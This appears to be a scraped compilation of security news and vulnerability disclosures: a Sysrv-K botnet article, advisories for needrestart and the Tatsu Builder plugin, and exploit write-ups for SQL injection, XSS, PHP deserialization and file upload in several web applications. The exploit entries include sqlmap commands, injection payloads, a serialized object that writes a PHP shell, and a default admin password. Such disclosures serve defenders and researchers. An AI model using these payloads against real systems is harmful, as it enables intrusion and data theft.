By Deeba Ahmed
Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems. The Microsoft…
This is a post from HackRead.com Read the original post: New Sysrv-k Botnet Infecting Windows and Linux Systems with Cryptominer

Microsoft has discovered a new Sysrv botnet variant deploying cryptocurrency miners on Windows and Linux systems.

The Microsoft Security Intelligence team posted a series of tweets on their official Twitter handle (@MsftSecIntel) to reveal startling details on the new variant of the notorious Sysrv botnet dubbed Sysrv-K.

According to the thread, the new variant exploits vulnerabilities recently identified in the Spring Framework’s API gateway called the Spring Cloud Gateway and WordPress and deploys cryptocurrency miners on Windows and Linux systems.

**How does the Botnet work?**

According to Microsoft, the botnet first scans the web to identify vulnerable servers and installs itself. The vulnerabilities it looks for include remote file disclosure, remote code execution, path traversal, and arbitrary file download.

The tech giant noted that Sysrv-K exploits numerous old flaws, particularly those identified in WordPress, as well as new vulnerabilities like CVE-2022-22947, which has a CVSS score of 10 and affects the Spring Cloud Gateway and Oracle’s Communications Cloud-Native Core Network Exposure Function.

The vulnerability exposes apps to code injection attacks and allows unauthorized attackers to carry out remote code execution. Interestingly, all these vulnerabilities have patches.

**Details of Sysrv and Sysrv-K**

The Sysrv botnet has been active since late 2020 and exploits known security flaws in access interfaces to install a Monero crypto miner on compromised Windows and Linux systems. The older version of the botnet targeted databases and web apps, such as Confluence, Jira, MongoDB, Oracle WebLogic, ThinkPHP, Mongo-Express, Drupal, Apache Struts, and Salt-API, reported Juniper in 2021.

The new version comes with a range of new features. Such as it can scan for WordPress configuration files and their backups to extract database credentials. The botnet uses the information to control the webserver.

Additionally, it boasts advanced communication features, including using a Telegram bot. It can scan for SSH keys, hostnames, and IP addresses and spread its copies across the network to infect the entire network and make it a part of its botnet army.

Microsoft Security Intelligence team on Twitter

**More Linux and Windows Botnet News**

1.  Old crypto-malware makes come back, hits Windows, Linux devices
2.  Kraken botnet bypasses Windows Defender to steal crypto wallet data
3.  HolesWarm crypto-malware hits unpatched Linux and Windows servers
4.  Beware; Adwind RAT infecting Windows, OS X, Linux and Android Devices
5.  Linux & Windows hit with disk wiper, ransomware & crypto Xbash malware

**How to Stay Safe?**

Microsoft suggests that organizations using internet-exposed Linux or Windows systems must install security updates immediately as it is imperative to secure these systems. They must ensure “building credential hygiene” and timely apply security updates.

New Sysrv-k Botnet Infecting Windows and Linux Systems with Cryptominer

needrestart 0.8 through 3.5 before 3.6 is prone to local privilege escalation. Regexes to detect the Perl, Python, and Ruby interpreters are not anchored, allowing a local user to escalate privileges when needrestart tries to detect if interpreters are using old source files.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2022-30688: security - CVE-2022-30688: needrestart 0.8+ local privilege escalation

WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\pages\sections_save.php namesection2 parameters.

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

CVE-2022-30072: CVE/CVE-2022-30072.pdf at main · APTX-4879/CVE

Online Discussion Forum Site version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Online Discussion Forum Site 1.0 - 'id' Blind SQL Injection# Date: 15/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Code:line 3 in file "/odfs/posts/view_post.php"$qry = $conn->query("SELECT p.*, u.username, u.avatar, c.name as `category` FROM `post_list` p inner join category_list c on p.category_id = c.id inner join `users` u on p.user_id = u.id where p.id= '{$_GET['id']}'");# Sqlmap command:sqlmap -u 'http://localhost/odfs/?id=1&p=posts/view_post' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1' AND 5178=5178-- Iddj&p=posts/view_post    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))amvG)-- ikmN&p=posts/view_post    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: id=-3669' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7671,0x65776b4d4272577956694c6549674a64546761564c79566d556255634a426c7a66464e6e527a4779,0x71767a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&p=posts/view_post

Online Discussion Forum Site 1.0 SQL Injection

OpenCart So Listing Tabs component versions 2.2.0 and below suffer from a deserialization vulnerability that can allow for arbitrary file writes.

    [-] Affected Versions:Version 2.2.0 is affected, and prior versions are likely affected too.[-] Vulnerabilities Description:Vulnerable component is switching to another tab. To exploitvulnerability, an attacker may send a POST request (withapplication/x-www-form-urlencoded content-type) to AJAX endpoint(usually "/index.php") with "is_ajax_listing_tabs" parameter set to"1" and "setting" parameter containing a PHP-serialized object,which would be deserialized at server-side. Gadget-chains based on PHPserver-side code can be used to gain remote code execution, filewrite, DOS, etc.So Listing Tabs is an Opencart plugin, so the Opencart PHP classes areavailable in webapp lifecycle. In source code of Opencart there is a PHPgadget-chain which allows to write a file to the server.Using this gadget, an attacker can write .php files with PHP code insideapp's web root and then execute it via requesting them, thus gainingremote codeexecution, which makes insecure deserialization in So Listing Tabsespecially dangerous. Ability to write files can also be used to DOS thesystem by writing large files and exhausting disk space, it can be used toperform XSS attacks by creating HTML files inside web root.Here is an example of request which will write PHP file on serverin /tmp directory:---POST /index.php HTTP/2Host: 0.0.0.0Content-Length: 3870Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://0.0.0.0/is_ajax_listing_tabs=1&ajax_reslisting_start=0&categoryid=p_date_added&setting=a%3a74%3a{s%3a6%3a"action"%3bs%3a9%3a"save_edit"%3b......s%3a2%3a"aa"%3bO%3A9%3A%22DB%5CMySQLi%22%3A1%3A%7Bs%3A21%3A%22%00DB%5CMySQLi%00connection%22%3BO%3A7%3A%22Session%22%3A3%3A%7Bs%3A10%3A%22%00%2A%00adaptor%22%3BO%3A21%3A%22Twig_Cache_Filesystem%22%3A2%3A%7Bs%3A32%3A%22%00Twig_Cache_Filesystem%00directory%22%3BN%3Bs%3A30%3A%22%00Twig_Cache_Filesystem%00options%22%3BN%3B%7Ds%3A13%3A%22%00%2A%00session_id%22%3Bs%3A11%3A%22%2Ftmp%2Fff.php%22%3Bs%3A4%3A%22data%22%3Bs%3A24%3A%22%3C%3Fphp+system%28%22ls+%2F%22%29%3B+%3F%3E%22%3B%7D%7D}&lbmoduleid=157---[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[28/01/2022] - CVE number assigned[31/01/2022] - Vendor contacted[02/02/2022] - Vendor asked for description of vulnerability[02/02/2022] - Send report to vendor[11/02/2022] - Vendor contacted for asking about updates[11/02/2022] - Vendor answered that did not get the report[11/02/2022] - Send report again[16/02/2022] - Vendor contacted to ask about receiving the report[17/02/2022] - Automatic generated answer about overloaded system[07/04/2022] - Vendor contacted again asking for updates[15/05/2022] - Vendor contacted to notify about public disclosure[16/05/2022] - Vendor contacted to notify about public disclosure toenother email[16/05/2022] - Public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the id CVE-2022-24108 to these vulnerabilities.[-] Credits:Vulnerability discovered by    Denis Mironov (SolidSoft LLC),    Alexey Smirnov (SolidSoft LLC),    Daniil Sigalov (SolidSoft LLC),    Dmitry Pavlov (SolidSoft LLC),    Maxim Malkov (SolidSoft LLC)

OpenCart So Listing Tabs 2.2.0 Unsafe Deserialization

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

T-Soft E-Commerce version 4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)# Exploit Author: Alperen Ergel (alpernae IG/TW)# Web Site: https://alperenae.gitbook.io/# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# Date: 2022-05-10# CVE :N/A######## Description ########## 1-) Login administrator page and add product# # 2-) add product name to xss payload ## 3-) Back to web site then will be work payload########## Proof of Concept ########========>>> REQUEST <<<=========POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 1028Origin: https://domain.comDnt: 1Referer: https://domain.com/srv/admin/products/save-edit/index?id=12Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetask=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100&StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0&KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false&Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi=&TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw=&Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0&UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0

T-Soft E-Commerce 4 Cross Site Scripting

WordPress Tatsu Builder plugin versions prior to 3.3.13 suffer from an unauthenticated remote code execution vulnerability.

Description: Unauthenticated Remote Code Execution

Affected Plugin: Tatsu Builder

Plugin Slug: tatsu

Plugin Developer: BrandExponents

Affected Versions: < 3.3.13

CVE ID: CVE-2021-25094

CVSS Score: 8.1 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Researcher/s: Vincent Michel (darkpills)

Fully Patched Version: 3.3.13

Indicators of Attack

Most of the attacks we have seen are probing attacks to determine the presence of a vulnerable plugin.

These may appear in your logs with the following URL:

/wp-admin/admin-ajax.php?action=add_custom_font

The vast majority of attacks are the work of just a few IP addresses.

The top 3 attacking IP addresses have each attacked over 1 million sites:

148.251.183.254

176.9.117.218

217.160.145.62

An additional 15 IP addresses have each attacked over 100,000 sites:

65.108.104.19

62.197.136.102

51.38.41.15

31.210.20.170

31.210.20.101

85.202.169.175

85.202.169.71

85.202.169.86

85.202.169.36

85.202.169.83

85.202.169.92

194.233.87.7

2.56.56.203

85.202.169.129

135.181.0.188

Indicators of Compromise

The most common payload we’ve seen is a dropper used to place additional malware located in a randomly-named subfolder of wp-content/uploads/typehub/custom/ such as wp-content/uploads/typehub/custom/vjxfvzcd.

The dropper is typically named .sp3ctra_XO.php and has an MD5 hash of 3708363c5b7bf582f8477b1c82c8cbf8.

Note the dot at the beginning as this indicates a hidden file, which is necessary to exploit the vulnerability as it takes advantage of a race condition.

This file is detected by the Wordfence scanner.

What Should I do?

All Wordfence users with the Wordfence Web Application Firewall active, including Wordfence free customers, are protected against this vulnerability. Nonetheless, if you use the Tatsu Builder plugin, we strongly recommend updating to the latest version available, which is 3.3.13 at the time of this writing. Please note that version 3.3.12 contained a partial patch but did not fully address all issues.

If you know anyone using the Tatsu Builder plugin on their site, we urge you to forward this article to them as this is a large-scale attack and any vulnerable sites that are not updated and not using some form of a Web Application Firewall are at risk of complete site takeover.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

WordPress Tatsu Builder Remote Code Execution

The Skyoftech So Listing Tabs module 2.2.0 for OpenCart allows a remote attacker to inject a serialized PHP object via the setting parameter, potentially resulting in the ability to write to files on the server, cause DoS, and achieve remote code execution because of deserialization of untrusted data.

**So Listing Tabs – A powerful Responsive OpenCart 3.0.x & OpenCart 2.x module for professionally product listing**

So Listing Tabs OpenCart module arranges your products according to categories or product’s attributes: name, price, quantity, added date…And you are free to choose what categories, attributes to display. Each tabs is available with title and tab icon. You can choose whether to show the icon or not; set the width/height for the icon as well. Besides, the module support over 10 amazing effects for items appearing with ability of setting duration/delay time for the animation.

The friendly user interface of So Listing Tabs allows you totally manage all parameters of the module. You can set which categories or item’s fields to show. Besides, you are able to manage the way to display the items in the listing tabs with many useful options: title, description, created date… It can works well on any OpenCart themes.

**Note**: This module has been updated with new installation method, view more at: New Way to Install OpenCart Module

Are you interested in SO Listing Tabs module? Let’s preview the Demo now!

**MAIN FEATURES**

*   Support Opencart 2.0.x, 2.1.x, 2.2.x, 2.3.0.x & OC 3.x
*   Fully compatible with IE9+, Firefox 2+, Flock 0.7+, Netscape, Safari, Opera 9.5 and Chrome
*   Support Responsive layout
*   Support to open link in Same Window and New Window
*   Support Multi-Module in the same page
*   Allow to set number of column for each screen resolution
*   Allow to choose listing tabs as categories or item’s attributes
*   Allow to choose categories which you want to show
*   Allow to include or exclude products from child categories
*   Allow to set the number of child category levels to return
*   Allow to select ordering direction: Ascending/Descending.
*   Allow to set the number of products to display
*   Allow to choose Products Field which you want to show tabs
*   Allow to display tab All OR not
*   Allow to set the max length for category title
*   Allow to display category’s icon OR not
*   Allow to order category Name/Odering/Random
*   Allow to set width/height of category’s icon
*   Allow to display item attributes or not: title, description, created date
*   Allow to set the max length of item’s description can be showed
*   Allow to show/hide Product Image
*   Allow to set width/height of item’s image
*   Allow to select effect for item appearing
*   Allow to set how long animation will run
*   Allow to set a timer to delay the excution of the next item in the queue
*   Allow to set the content to show at the top and at the end of module

**CHANGELOG**

VERSION 2.2.3 for OC3 - Update - Released on October 04, 2019  

\[Update\] Add URL for Heading title of Module

\[Update\] Get demo data when configure the module without available data

  

Version 2.2.0: Updated on 20 July, 2017-----------
\[+\] Compatible with OpenCart 3.0.x

VERSION 2.1.0-Update - Released on Sep 16, 2016
+ Support RTL for Opencart version 2.3.0.x 

VERSION 2.1.0 - Released on Aug 16, 2016
+ Support Opencart version 2.3.0.x

VERSION 2.0.2 - Released on Jun 21, 2016 
+ Added Cache function 

VERSION 2.0.1 - Released on Apr 11, 2016
+ Fixed errors related to duplicate file and CSS style and 
+ Fixed error when using animate.css style 

VERSION 2.0.0 - Released on Mar 28, 2016
+ Support Opencart version 2.2.x

VERSION 1.0.7 - Released on Mar 8, 2016
- Updated structural display on the front-end
- Added post-text and pre-text 

VERSION 1.0.6 - Released on Dec 28, 2015
- Updated with js and module notification

VERSION 1.0.5 - Released on Dec 16, 2015
- Added more functions

VERSION 1.0.4 - Released on Dec 10, 2015
- Updated to directly upload the package in the admin panel

VERSION 1.0.3 - Released on Dec 05, 2015
- Upgraded to OpenCart 2.1 
- Added more functions

VERSION 1.0.1 -Released on Aug 22, 2015
+ Added more params: Show Title of Module, Module Class Suffix, Type Show, Row
+ Changed tab Effect Options

VERSION 1.0.0 -Released on Aug 05, 2015
- Initial release

CVE-2022-24108: Responsive OpenCart 3.0.x & OpenCart 2.x Module - So Listing Tabs

GXCMS V1.5 has a file upload vulnerability in the background. The vulnerability is the template management page. You can edit any template content and then rename to PHP suffix file, after calling PHP file can control the server.

1、Vulnerability code Audit  
The vulnerability appears in the template management page in the background:  
  
/views/admin/tpl\_add. HTML file is received by filename, content is received by content, and then the data is sent to? S =Admin/Tpl/Update  
  
Track? S = Admin/Tpl/Update page source/core/Lib/Action/Admin/TplAction class. PHP file, see the Update function to receive the filename and the content variables, only after receiving the two variables for judging whether it is empty, Data is written to the file directly using the write\_file function without dangerous character detection for file names and contents, which means there is any file upload vulnerability.  

2、The exploit  
Log in to the background of the target website by admin default password admin888 or password blasting or even phishing, click Template Management to enter the /template/default/Home directory, select any file and click Edit:  
  
Enter the EDIT page, enter the PHP test code in the file content form, start the BurpSuite tool to capture packages, and click Submit:  
  
After BurpSuite catches the package, change the filename suffix to PHP and click "Put the package" :  
  
My\_hot\_info.php file was created successfully, and the PHP test code was successfully executed.

Tag

#php